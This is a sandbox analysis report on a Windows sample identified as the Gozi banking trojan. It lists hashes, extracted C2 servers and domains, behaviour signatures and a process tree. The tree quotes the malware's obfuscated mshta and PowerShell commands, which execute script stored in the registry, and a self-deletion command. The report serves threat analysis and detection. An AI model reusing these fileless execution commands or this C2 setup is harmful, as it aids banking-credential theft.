Overview

overview

10

Static

static

3

client.exe

windows7-x64

10

client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2023 11:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    client.exe

  • Size

    294KB

  • MD5

    bb35f8c1a3236ad31c754cdfe795d57f

  • SHA1

    b744f8ae31e2b3f7c3b72b9615823a3a3ad02989

  • SHA256

    5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2

  • SHA512

    fcb8f4458b7a5a4a2536a22ad55e4564ffe3d3327e4eefca10a30bc490ae29c8cc31760e07d567de53150090c84bb171209f1f3811f22d3f69545beb15edd0b0

  • SSDEEP

    3072:4e6lIjmvg7aaCIg0JHk8D8uNhUqHAMMQKL2H/NHIS:4blIavYaaCIg6h/NhUDAHlH

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

185.247.184.139

62.72.33.155

incontroler.com
Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3788
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4920
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4068
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3248
        • C:\Users\Admin\AppData\Local\Temp\client.exe
          "C:\Users\Admin\AppData\Local\Temp\client.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:768
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1400
            3⤵
            • Program crash
            PID:1248
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Teta='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Teta).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4088
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xforgvsflb -value gp; new-alias -name xnymdos -value iex; xnymdos ([System.Text.Encoding]::ASCII.GetString((xforgvsflb "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4108
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ig5hudni\ig5hudni.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3680
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC83.tmp" "c:\Users\Admin\AppData\Local\Temp\ig5hudni\CSC85D87315AC61453CAB6A2736A67F6976.TMP"
                5⤵
                  PID:4616
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v4fhb01\5v4fhb01.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3804
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDBB.tmp" "c:\Users\Admin\AppData\Local\Temp\5v4fhb01\CSC139A52D6CF4D49C6A9EFDDBE298D11DB.TMP"
                  5⤵
                    PID:4756
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3816
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1440
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:5052
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:5088
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 768 -ip 768
              1⤵
                PID:2904

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Initial Access

              Execution

              Persistence

              Privilege Escalation

              Defense Evasion

              Credential Access

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              2
              T1082

              Remote System Discovery

              1
              T1018

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Resource Development

              Reconnaissance

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\5v4fhb01\5v4fhb01.dll
                Filesize

                3KB

                MD5

                1f1ed0550d56d35b9bf3a792e98414ba

                SHA1

                49ace35862bf6eec8169d49065c93e081e276164

                SHA256

                aeb3cf02e84f10982dbbadec89bb7bf2e357ab2cf10c549893fee6a53901b3c6

                SHA512

                713ce1dfb567a10c102d258e79f897f525697e5a184e20fdde8c0358a233c229c9307ee4b4af815cb3e113afaadbf316db8ca4e9a4648d7a71ec5f4cf5536972

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESEC83.tmp
                Filesize

                1KB

                MD5

                dd482669da25956f8945b017fd876efb

                SHA1

                a1f8222de9bf59006dbccf1db71f27251200c69c

                SHA256

                e139cc7f56cc119ac1d4a3cd659bf6c821ae5bd1e28d01a3adedd32f4ca0312a

                SHA512

                f98cbe8909356edbdfebd736ef8b86e4900fb69d80d32b234d9afb6b2dca3030a86cfec2f6c74818ef085fe3ce078d33f2f83da1e77f5f31103d5ffe4cc41c06

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESEDBB.tmp
                Filesize

                1KB

                MD5

                2bac08c8b0db92573423219b9abe8fe7

                SHA1

                57c918ef89695a9b66cc4f98ae9b047734971673

                SHA256

                faf2a9103483b3f8479bdaae291bee3e387b72582b86f7e6f71b48371ed7633c

                SHA512

                fea5ec3b95fe40bc155f2b2ecc39d8c3b3bfc27dd00fa030b0cc6892088666a5e57afc8f56df548c74bee4ba26c92083ce84d3109d618227f52a618bd46f0b3d

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwkihrfm.cld.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\ig5hudni\ig5hudni.dll
                Filesize

                3KB

                MD5

                32ff5506cc1fdd3e6d59cc700f7da67b

                SHA1

                9b4969dbee8ffee7b34cf75ee141f5c72aadd5fe

                SHA256

                e9e131a89fd05686ffd74bd81ed702c3743d76bfa6933f6f214d8203e8408813

                SHA512

                7e9c8e8a357731ecb6e3dd057c0b307ea85bd2046bcfd908133faedf2fbb7470ff71b5bc46ac33de1e6bdb200151213f494e56fe969d459c9eb3f13a0593f0af

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\5v4fhb01\5v4fhb01.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\5v4fhb01\5v4fhb01.cmdline
                Filesize

                369B

                MD5

                69b10dcd95c7df43ab8c837bc89914fb

                SHA1

                572c8ac14e68d0b76c6632b2009b5fe2c330089c

                SHA256

                dd2a29d675fb89cc654b27619c3ebaa992a8555106732d193910521fc1473de9

                SHA512

                ead8a31a45b6dead3e44c4fd411e1aeb73d0cf13d7d67d7691cefc5ba050c3082e5322c7ae4b174cf20bdf9ee144ee01fa9e3b390d45f854b85434562dbf4939

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\5v4fhb01\CSC139A52D6CF4D49C6A9EFDDBE298D11DB.TMP
                Filesize

                652B

                MD5

                295f8d0c342db4745c5ff278a051210e

                SHA1

                ba6064d07bef884fb51a4c334370de8889c0560a

                SHA256

                a185b3946b5fd5a0902bc023e16e46b1ec98e98a6770a89a78a9f109e35b1076

                SHA512

                e63b845a0f27ca2ebcc0493519a0d798a5524b3d82ee37443b6279b8e7c92bcf25efdc4d9eadcab0c2976d72ca9140c14fe1e683152fe950738aecfc4bb47e96

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ig5hudni\CSC85D87315AC61453CAB6A2736A67F6976.TMP
                Filesize

                652B

                MD5

                efec0dacbd803d24742839666867f185

                SHA1

                af93e2563e62f3458a7c45272cf6af9003e60e5a

                SHA256

                a429d4c7ce0535a4fe317cbe8291b6130ef75f998c1da7941badfa55b1665a21

                SHA512

                b2c1e58bd0d5f3870b4b8a70aaa7d6f99fdc969a3a2804797e2035b6a5dff479a1019e9010c13e4539bc787a7e38bff16afb0feadbe3b5dd3d11f8264d2de6c8

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ig5hudni\ig5hudni.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ig5hudni\ig5hudni.cmdline
                Filesize

                369B

                MD5

                af167bc8af1d2a48276267a431e82a36

                SHA1

                7966ecfe59671392c80975db3cc298da3a0c5c34

                SHA256

                d24b10e0b61c5c662a55657f54ec168c61a2d76d8adfd8edc8778dc5c48eaf25

                SHA512

                d846475ac55671f3793f720b1f365b1fa2011a63e6b166e99309655aba14e835d37e52437b29553ed5d65fc020d7879bb6e5cc0b438d3cc37e9812e51e893a34

                Download Submit
              • memory/768-8-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/768-114-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/768-9-0x0000000002310000-0x000000000231B000-memory.dmp
                Filesize

                44KB

                Download
              • memory/768-1-0x0000000002420000-0x0000000002520000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/768-7-0x0000000002420000-0x0000000002520000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/768-4-0x0000000002330000-0x000000000233D000-memory.dmp
                Filesize

                52KB

                Download
              • memory/768-3-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/768-2-0x0000000002310000-0x000000000231B000-memory.dmp
                Filesize

                44KB

                Download
              • memory/1440-111-0x000001E817EA0000-0x000001E817EA1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1440-108-0x000001E817FF0000-0x000001E818094000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1440-117-0x000001E817FF0000-0x000001E818094000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3248-56-0x0000000008CC0000-0x0000000008D64000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3248-57-0x0000000000C60000-0x0000000000C61000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3248-98-0x0000000008CC0000-0x0000000008D64000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3788-109-0x000001D6ABA50000-0x000001D6ABAF4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3788-71-0x000001D6ABA50000-0x000001D6ABAF4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3788-72-0x000001D6AABD0000-0x000001D6AABD1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3816-96-0x00000243D68B0000-0x00000243D6954000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3816-118-0x00000243D68B0000-0x00000243D6954000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3816-101-0x00000243D6960000-0x00000243D6961000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4068-115-0x00000216B2C30000-0x00000216B2CD4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4068-76-0x00000216B2C30000-0x00000216B2CD4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4068-78-0x00000216B2BF0000-0x00000216B2BF1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4108-23-0x00007FFB77AF0000-0x00007FFB785B1000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4108-68-0x00007FFB77AF0000-0x00007FFB785B1000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4108-63-0x0000021D13B10000-0x0000021D13B2E000-memory.dmp
                Filesize

                120KB

                Download
              • memory/4108-54-0x0000021D2C570000-0x0000021D2C5AD000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4108-38-0x0000021D2C100000-0x0000021D2C108000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4108-69-0x0000021D2C570000-0x0000021D2C5AD000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4108-18-0x0000021D13CA0000-0x0000021D13CC2000-memory.dmp
                Filesize

                136KB

                Download
              • memory/4108-52-0x0000021D2C560000-0x0000021D2C568000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4108-25-0x0000021D2C110000-0x0000021D2C120000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4108-24-0x0000021D2C110000-0x0000021D2C120000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4920-82-0x000001F951EC0000-0x000001F951F64000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4920-83-0x000001F94FBF0000-0x000001F94FBF1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4920-116-0x000001F951EC0000-0x000001F951F64000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5052-106-0x0000000000EA0000-0x0000000000F38000-memory.dmp
                Filesize

                608KB

                Download
              • memory/5052-97-0x0000000000EA0000-0x0000000000F38000-memory.dmp
                Filesize

                608KB

                Download
              • memory/5052-104-0x00000000007F0000-0x00000000007F1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/5088-119-0x000001D43FB40000-0x000001D43FBE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5088-89-0x000001D43FB40000-0x000001D43FBE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5088-90-0x000001D43F610000-0x000001D43F611000-memory.dmp
                Filesize

                4KB

                Download